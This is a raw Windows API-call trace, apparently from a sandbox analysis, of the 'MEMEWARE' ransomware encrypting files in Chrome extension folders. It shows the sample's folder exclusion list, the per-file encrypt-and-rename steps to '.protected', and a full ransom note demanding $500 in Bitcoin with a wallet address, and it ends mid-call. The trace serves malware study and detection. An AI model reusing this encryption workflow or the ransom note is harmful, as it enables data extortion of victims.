(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.962] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.963] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.963] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.963] CloseHandle (hObject=0x164) returned 1 [0078.963] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0078.963] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0078.963] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419") returned 145 [0078.963] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0078.963] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0078.963] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*") returned 147 [0078.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.963] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.963] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\.") returned 147 [0078.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\..") returned 148 [0078.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.964] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.964] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.964] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.964] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.964] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.965] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.965] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.966] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0078.966] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.966] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.967] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.967] CloseHandle (hObject=0x168) returned 1 [0078.967] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected") returned 169 [0078.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0078.967] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.967] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.967] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0078.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.968] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.968] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.968] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.968] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.969] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.969] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.969] CloseHandle (hObject=0x164) returned 1 [0078.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0078.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et") returned 141 [0078.969] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0078.969] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0078.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*") returned 143 [0078.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\.") returned 143 [0078.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.969] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.969] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.969] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\..") returned 144 [0078.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.970] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.970] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.970] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.970] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.970] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.970] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json") returned 155 [0078.970] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.970] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.971] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.971] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.971] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.972] CloseHandle (hObject=0x168) returned 1 [0078.972] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected") returned 165 [0078.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.protected")) returned 1 [0078.972] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.972] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.972] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0078.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.972] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.972] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.973] lstrlenA 